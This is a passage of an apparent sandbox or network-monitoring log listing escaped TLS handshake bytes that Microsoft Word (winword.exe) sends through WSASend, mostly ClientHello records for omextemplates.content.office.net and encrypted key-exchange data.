216. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\x9b\\xa9s\\x86\\xb7#\\xaa\\xbe/\\x11r\\x9b\\xf3%=mp\\xa9\\x11\\xde\\xd2j\\xb1\\xea\\xdd\\x16\\xb6m\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
217.  
218.  
219. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92x\\x9c\\xf8\\xb94\\xb7zo\\x07\\x1e \\xfap;\\x9b\\xb2\\xdc;\\xf8\\xb2\\xb4\\xcc\\x8d\n\\xf8\\xf1\\x84+\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
220.  
221.  
222. "http_request": "winword.exe_WSASend_f\\x00\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92n\\xf0\\xcb_\\xdb\\xe6\\xda\\x80\\xe6j\\x1f\\xf3\\xa5&7\\x19\\xf3h\\x9c\\xdf@d\\x05\\xb2d\\xc4\\xe3i\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
223.  
224.  
225. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xcc\\xce\\x9e\\xf7\\xc2g\\xa7\\xd7p58\\xb3\\x0e\\x03\\x11n\\xeb\\xcc^v\\xbf\\x966a\\xf3\\xed\\x04\\x04\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
226.  
227.  
228. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xf1\\g\\xc9\\\\xa7*\\xda\\x8b\\xff\\xfc\\xeb+`\\xad\\xe2\\xa0%i\\xda\\xd1d\\xcc\\x1am\\xa1n\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
229.  
230.  
231. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92s\\x80,\\xf8\\xfc)\\x0f\\x02\\xae\\x8c\\xf2\\xe3\\x87\\x8e\\xb8\\xb84\\x87\\x1b\\xa4\\xabc|\\xfa\\x9c\\x06\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
232.  
233.  
234. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92.\\xfei\\x10\\xb9t\\xd3r\\x8e\\xce\\x16\\xa3\\xcbv\\xdef$c\\xd6\\xc6\\xa7\\xfa\\x08qt\\x08\\\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
235.  
236.  
237. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xa2\\xcd;\\x91\\xf3\\xfc\\\\xea\\xb5\\xb2\\xa0so\\xe5\\xb0\\xf12\\x971\\xebwo\\xb7\\x9e\\xc7\\xb7z\\xcd\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
238.  
239.  
240. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\x94\"\\xad\\x9194\nf\\xb4\\xb6i\\x1d<t\\xcdg\\x1e\\x945o\\xd1\\x0fl-x\\xf0\\x1f&\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
241.  
242.  
243. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xce\\x00\\x9d\\x02\\xf4#;\\x80\\xdd\\xb59m\\xe3y8\\xd5d\\xf5fo7\\xe3h\\xa5\\xb21\\x9c\\xd3\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
244.  
245.  
246. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92kz\\x16\\x1by\\x8b\\xca\\x83\\xdc\\xdc\\x9e\\x06\\xfe\\xf7\\xe6\\xfbj\\xbc4\\x1f\\xad\\xc8\\x11\\x8bh-\\xad\\xa2\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
247.  
248.  
249. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x925\\x83\\x92\t\\xeebsbo1\\x89c8@\\xae\\xbb\\xb7d\\xc3\\x02\\xe5\\xf8\\xa5\\x05\\xd8l\\xdb\\x91\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
250.  
251.  
252. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xc1\\xd6\\xde\ry\\xb1p>\\x8d\\x8c\\x10\\xad2&c\\xd1\\xb0\\xb6\\x1d\\x02(k\\x03it\\xefp\\x87\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
253.  
254.  
255. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xcc*\\xe4k\\xc6\\xc8\\x99\\xe7\\xc8-\\x0c\\xb5\\xbac\\xfa\\xa0\\x9a\\xe9\\x92\\xa0qnue\\x10\\x01\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
256.  
257.  
258. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92k\\xb9_\\xec\\xc3\\xc1w\\x05\\xc9\\xe6\\x14#\\xd80\\x89aa\\x8e\\xef\\x8e\\x91\\xde'91\\x9b\\xdez\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
259.  
260.  
261. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x19\\x14\\xe4\\xa9\\x81\\x87\\x8a\\x80.\\xd9\\xbbh\\xcd\\xb2;@\r\\xc1\\x82o z\\x14\\x10_b\\xae\\xa6\\\\xad\\x1f\\xccc\\x10#5\\xde\\xce\\xdd\\xedm\\x1f\\x16d\\xf1\\xe4\\xa9\\xf5w\\xf5\\xb6\\xc7n\\x05\\xcbqd0\\x03\\x00\\xd6\\x90\\x04\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000rn\\x19\\x9fn\\x0c\\xbd\\x9a\\xed.\\x8ay)8\\xaa\\xc7\\xd5\\xf8\\x91u\\xda\\x00ar\\xb1,=\\xd5,s\\x0ec\\x83zn\\x87\\x9e\\x01t\\xf8\\x1e\\xfae~x\\x16"
262.  
263.  
264. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x9f\\xd1\\xbfy\\xe7\\xa1@\\xe8\\x91bnd\\xd6\\xc8wu\\x12\\xf8\\xee\\x12\\xb0\\xed k\\xc0\\xaf\\x8d\\xc1\\xa3\\xcf\\xaf\\xe0a\\x87\\xe3omb\\x8ck\\xa4\\xd0\\xb3\\x90\\xdcd\\xac\\xce\\xfd\\x11\\x1c\\x9d\\x02:\\x9dnfx\\xe5\\xe1\\xc7p\\xa9\\xcc\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xc47\\x13\\x06o\\xe6\\xa3\\x1f,h\\x9f\\xc1\\xc0\\x0b\\xa3\\x89\\xb3\\xd2\\x03|\\xf1\\xe6\\x9ey\\x19\\xa8\\xb5k\\xa3\\xd0^\\xe0\\xda\\xdan\\xc1+\\x13\\xb3\\xac\\xc1\\xbaa\\xa6\\xad\\x85\\x95|"
265.  
266.  
267. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x9b!\\xd0\\x8c\\x7f \\x8aqi\\xad\\xc1\\xa8\\x15\\xdd\\x8b\\xd38\\xf5\\x1c\\x1a\\xfa\\xdc^f'\\xefd;+\\xf9,\\xf4%\\x97\\xf0\\x9d\\x17\\xe1\\xf3\\xf3\\xdd\\x141\\x154\\xd9\\x02'\\x1d\\xe3`\\xbfc\\xe8\\x14/\\x12e\\xcb\\xf3\\xd5\\xce\\xc9\\xe4\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x8d\\xdd\\x89\\xa1\\x81.\\x7f\\x93\\x8266p=\\xe5\\xc9\\xce\\xd9\\xa6i\\xcc2\\x1a\\xd6\\xb1^j\\xed\\x8f\\xa7\\xe43\\xfe\n\\x83\\x81jv\\xff\\xe1\\x98$\\xb8nt%f"
268.  
269.  
270. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xca\\xfdgd\\x8d\\xb5\\xc6)\\xaa\\xe9\\x8e\\xec\\x1c^#<\\xbb\\xe9\\xc7\\xc6\\x7fw\\x0c\\x1d+\\x93l\\xab\\xc0hf\\xd8\\xb5dr\\x98\\xd1\\x06w\\xbe\\xa8\\x12\\xbe\\xb7\\xb0\\x97u\\xc9\\xa8\\x9a\\x9c\\xcboq*@kna\\xd1jf`\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000|\\xb9e\\x9f\\xc9\\xa3-\\xd3\"\\x01\\xf7\\x14\\x0ey\\xe6\\x19!\\x05\\x0e><\\xad\\x80=9y\\xca\\xec\\x85\\xd6\\xcby\\x9f\\xb6`\\xeeq\\x0c\\x8d\\x9a\\xdd\\xa8ge#d\\xb0\\x15"
271.  
272.  
273. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xc3:\\xccr=r\\xde*\\x91\\x86i\\xa8\\xd9\\xaf\\xc4\\x0e\\x08\\xc7e)\\xf0j\\xc5\\x08tw5\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
274.  
275.  
276. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x18\\xb6?\\x113\\xbd\\x8d\\x89\\xa2x\\x0b\\xdc\\x10\\xeesy\\xfdx\\xde\\x18)f\\x7f\\x7fz\\xfb\\xb8\\xf5\\xdb\\x86\\x1c@\\xd4ng\\x94\\x1c\\x18u@8\\xfb.l\\xf4ih\\xaf\\xc9\\xda\\x92\\xaflj\\xee\\x85\\xe0\\xf7\\xae\\x0e\\xbc\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x0002\\x13\\x86\\x04^\\x03\\xf8m\\xabfh\\x88\\xfbm\\xf4hjn\\x8e\\xda~\\xb4i;\\xd3\\xef\\x8e\\x93x\r\\xcf\\x14\\xef\\xd5\\x80\\x8c\\xde\\x96\\x15\\xea\\xfcih\\xeeu"
277.  
278.  
279. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x91\\xaa\\xa1\\xe0&\\xec\\xca/\\xc0\\x84\\xb3i\\xab\\xc9~\\xab\\xb7\\x1b\\xbc9\\xc6\\xbd\\xe0h\\xfe\\xf5/o\\xb6\\xc2i\\xb1l\\x9a\\xa1\\xcau|.e\\x93h\tb%\\x85\\xc4\\x94\\x8f\\xdf\\xca\\xc2\\x82\\xdb\\xc6\\xc7\\xdb\\x11\\x15\\xa8p\\xff\\x8c\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xee\\xfd5\\xae\\xec\\xfc\\xfd\\xa1\\x9b.\\x03\\x8e\\x9d\\xbbls\\xc5\\xa7h\\xcb\\xffm\\xee\\xc2\t\\xe1\\xe9\"\\x85u\\xdd\\x92\\xe0\t\\xe7\\xfao\\xca\\x9d\\xb2\\x95\\x13l^\\x0e\\xdf\\x0b,"
280.  
281.  
282. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04rk\\xa2\\xeao\\x0b\\xaf\\xa9#e\\x97\\x9dwo\\xa0\\xcdj\\x89!\\x9d\\xc1g\\x04\\x98\\xdbj:k\\xf7\\xa9\\xe6\\xc4\\xb4\\xe3\\xf7\\x7f,\\xf0\\xd2\\k\\x97\\xa0\\xf6\\x9c\\x04'\\xaee\\xe4<x\\x92d\\xd20\\xd9\\x83 w\\xf4\\xd6\\xcd\\x0c\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x85\\xa6\\xd3\\xa0\\xf0\\x0f\\xb28\\xc9\\xd8=\\xb1w\\xc5\\xc9~\\x8e\\x90\\x88\\x98&\\x89\\xeb\\xf6jw\\xc0\\xae\\xd9\\x04\\x0e\\x93\\x12\\xd9e\\xb9\\x90vx\\xc12\\xe7\\x06t\\x96r\\xefn"
283.  
284.  
285. "http_request": "winword.exe_WSASend_\\x06\\x01\\x01\\x00f\\x10\\x00\\x00ba\\x04>\\xcb\\x1c\\x9b\\x06\\x02\\xcd\\xc4\\x98\\x854\\x0cz\\x96|\\xa5\\xbe\\x88\\x0f\\xf7\\xa0\\x92\\xd4\\xef\\\\xbc\\x86g\\x9cl\\x8f%\\x9c\\x08\\xa0%\t^t?\\x90_\\xd6\\xf2\\x1c\\x92oq*$\\xb9c\\xad\\xd8\\xa7\\x9a\\xa51\\xee\\xf6\\x1aw\\xa4\t\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xbb\\x9el\\xa8r\\xab\\xedlh6\\x0f\\xa6jf\\x9d\\x17\\x96\\x8b7$\\xcd\\xcc\\xd5\\x96\\x06\\x05\\xf3\\x12v\\xeb\\x89\\xb6\\xc0s\\x98\\xc7c\\x0f\\x06\\x03\\x05\\xfe\\xdfe`\\x9dz\\xf3"
286.  
287.  
288. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xde\\xac\\x81\\xdf5i\\xc4\\xcc`>\\xdd:\\xcf\\xf7\\x0et\\x97y'\\xa2\\xb74\\x05p3\\xeb\\xb0c\\xa5a\\xae\\xfe\\xfa\\xa4\\x8f\\xf27_\\xaa\\x1e\\x93qu\\xe6\\xf2\\x1fp\\xb4l\\xcb\\x9f\\xae\\xc2s_\\xf0\\x85p\\xf9\\xf7\\xf6\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000%\\xb6\\xe5\\x86\\x99\\xc40f\\x05\\xb8\\xdf\\xbb\\xbe\\xd0\\xd6\\x90a\\xce\\x06+\\x10\\x88\\x1b\\xbfw>ts\\x04\\xf3\\xf4$\\xf5\\xc9>nm\\x00\\xc3j.\\xc5c\\x18\\xde\\x83\t"
289.  
290.  
291. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04i\\x970\\xc8\\x8a#\\x87uf\\x81\\xe29\\xf3\\xf3u~\\x1a\\x17\\x94*\\xcc\\xc9\\xa6\\x0ee\\xc0\\x92\\x8e\\xca\\xa5\\xa3 \\xffa\\xfb\\xf7\\x8c\\xc1\\x92\\xdc\\xbcff3\\xb8\\xd5\\x10\\x8f>\\xda\\xb9?\\xf2%\\xd7)\\xa9\\xfb\\xfa\\xf2q\\x13/o\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x96:\\xa8@t\\x87ox\\xc5\\x97\\xf4\\x9by\\x0b\\x96\\xa1\\x86?\\x15\\x1c`\\x8a\\xefy\\xc1\\xd0>\\x9d\\xf9\\x0c\\xf2m\\x86o\\xa3\\xd7\\xa3\\xf2\\xa0\\x1ai\\xfb'\\xdb\\xc1\r\\xca\\x9a"
292.  
293.  
294. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xc1\\xda\\xf4e\\xccg\\xe6\\xbf\\xb3\\xd0\\xf9\\x1b\\x130\nvgb'\\x82\\x8c\\x19l\\x02\\x87\\xc6\\xfe\\xca\\xc1`\\x89\\xf5=o\\x93_q\t\\xc0\\xb7\\x87\\x93k\\xbdp)\\x85ez,#d+\\xafe\\xcb\\x02\\xf9\\xa9c\\x9c\\x80a\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xc2\\xe8c|\\xa8\\x95i\\x02v\\xe9-\\xbca\\xfeu\\xfai\\xddr\\x1ci\\xbcjd\\x1b\\xe81\\xa4#\\xe4\\xa8\\xb6\"\\xb9\\x95k\\x8a\\xf6:b\\x90/\\xe5y\\xc6v\\xf5\\x85"
295.  
296.  
297. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04u\\xdc\\x9a\\xf2\\xe6j\n\\xd5\\xa5\\xc0\\x1f\\x98\\xa7t9\\x1a\\xff7yj1:\\xbe_\\xea\\xe94\\xc5\\x15\\x0cb\\x93\\xf4\\xca\\x0e+\\xb5\\x0cf\\xb9\\x86\\x05y\\xc6\\x96\\xec\\xdb\\xe4z\\x19\\x81\\x1d\\x933.\\xa2`\\xe6\\xb9\"\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xbe\\x1da\\x19\\xf5\\x9fe\\x1c\\xdc\\xaaj\\x02\\xd2by\\x13\\xf6x\\xe8g\\xdf_\\xe2\\x00\\xcc4u\\xf2\\x04\\xf2/p\\xcb\\x00)&\\xc5\\xa5s\\xc8\\xb7\\x99f\\x8c\\x00g"
298.  
299.  
300. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xb3\\xd1\\xb1\\xd5|n7\\x86w\\xb8\\x07d\\xe6i!6s\\x8a\\xfb\\xa1&\\xc1\\x84%\\xbeu\\xbb\\xb4\\x13c\\xe58\\xeb9@\\x01\\xfe\\xdc\\xf2:j\\xf5\\xaa\\xf1\\xe4\\xf6\\k\\xe9r*\\xcbt\\xa7=\\xc1pus\\x95@h-\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xb5w5r\\xbc\\xc4\\xdf\\xa1\\x1a\\xd5qg\\xa2\\x0e%6ixl\\xa2\\xac\\xd3\\x17\\xae|\\x1byazj\\xc1\\xde\\xb9\\xcf\\xb7 \\x05\\x1d\\x85ek\\xf7.\\x15q\\xeb0"
301.  
302.  
303. "http_request": "winword.exe_WSASend_\\x1a\\x01\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd4i\\x05\\x85\\x8c\\x18g\\xe9\\xe4\\xbbh\\xd5\\x97ur\\x9e\\xf9\\xa5\\x9as|\\x83\\xbd\\xcdg\\xd6\\xf7/bh\\xf9$l\\xeaq\\xb3\\x03\\x06\\xb9\\xe4h\\xc5\\x19\\xa6\\\\xc9\\x89r\\xfb\\x9d\\x85\\xf9r,v\\x90\\xe7:4\\x13\\xe9\\xcd\\xde\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xf4\\xf5^\\xb3\\x086\\x10t\\x1e\\xa3\\x08u\\x90xu\\x82\\x14\\xa3\\xce\\xf0\\x95nu\\x00\\xe9\\xf9\\x8ccc2r\\x00\\x95\\x85\\x03k&\\x87\\x96s<\\xd8\\xa6\\xe5pc\\x15\\xa5"
304.  
305.  
306. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xc4x\\xa4 \\xe5c^\\x04\\x8c\\xdd>9\\xec\\x97\\x98\\xb5\\xe8\\x87v\\xaa\n\\xba\\xcb\\xf70i\\xf3\\xf0\\x07\\xde\\x92\\xec\\x12\\xd8t\\xb1x(h\\x89\\x9c\\xd5\\xc5\\x80\\xc6y\\x8c\\x9f\\x1c\\xb3\\x18\\x80\\xf07\\xfb\"\\xcf\\xf80\\x07\\xfe\\xa2\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x0b0\\xdd*t\\x18\\x04.w\\xb4\\xa5\\x1e\\x11\\xfc\\x13\\xec\\xf0_\\x99)\\xc8\\xd6\\xf7\\x8de\\xf8\\xf3\\x10\\x97gz\\xd0\\xfd\\xa7z\\x10\\x9e\\xff\\xf0h\\xa1\\xd7\\x1c\\xf6*\\xdf$\\xde"
307.  
308.  
309. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd4\\xfd\\x94\\x95\\xba|\\x9f_\\xaf\\xe3t\\xa4!;\\x03\\xec\\xa7\\x02\\xfe\\xc3o\t$%!\\x01/\\xd2vcd\\xb0\\xcam\\xa9g\\xbd\\x05\\xe2\\x98fe0\\x84\\x0f\\x0c\\xb2y\\xab\\xa9\\xb8s\\xcee\\x18\\xaffjy\\xfa\\x01\\xc4\\x0c\\xae\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000lc\\xd1\\xccd\\x07k\\x7fwt\\x99\\xfe\\xd0\\x94\\xdb\\xfb\\xd9\\xd3wc\\xef\\x16\\xef\\xed\\x15\\xc3\\x91\\xd8 3\\xea)\\xac\\xb7\\x1ep?\\x83\\xdfl\\xf4\\x1a\\x15?a4|"
310.  
311.  
312. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xf8\\xaa,x\\x96\\xb1fo\\x8c\\x91\\x19\\xe7\\x05\\xb4%%\\x02b\\xa5e\\xfa\\xc7;b\\x10\\xc8#cwp\\xe5p@\\xbb\\xbarz\\xcd=\\xa6d\\xb3\\xbf-\\xe4\\xe9z\\x05yx\\x8d2un\\xf1_\\x8agj\\xa55\\x01\\xd3\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xa0\\xbe\\x90\\xdfi\\x1d\\x86t\\x15j\\xd05\\x04\\xa4\\x0b\\x1d\\xe0a \\x81\\x008\\xc4\\xdff\\x82\\xad\\x89\r\\x05\\xe2\\xc8h\\xb3\\x7f\\xc7\t\\xa4\\x9d8!\\x19\\xe0'pmm("
313.  
314.  
315. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x12\\xf4\\x9f\\xec\\x833\\x88ta\\xf2\\x94\\xf0_\\x11\\xdc\\xaa\\x9e\\xb5u\\xa9)\\x11!w\\x1c\\x9c\\x15\\x01wc+\\x8d\\xe3b\\xcd\\xaf\\x18p\\x892\\xe1z\\xc6\\xb0<\\xd6\\xaa\\xdb_jh\\x0b\\xea\\xb4\\xb4\\x81\\xa3\\x13m\\x85\\xc3\\xff\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xd4\"n\\x82\\xda\\xa7\\xf6\\x84\\xc9\\xa5\\x7f\\xafp\\x81\\x0c\\xf7\\x83\\l+\\xfam\\x99h7\\xd6g\\xe6\\xc6\\xa9\\x18\\xd8\\xa7v\\xea\\xc1/)u#\\xf1\\xbf>\\x00\\xb3\\x9el\\xf7"
316.  
317.  
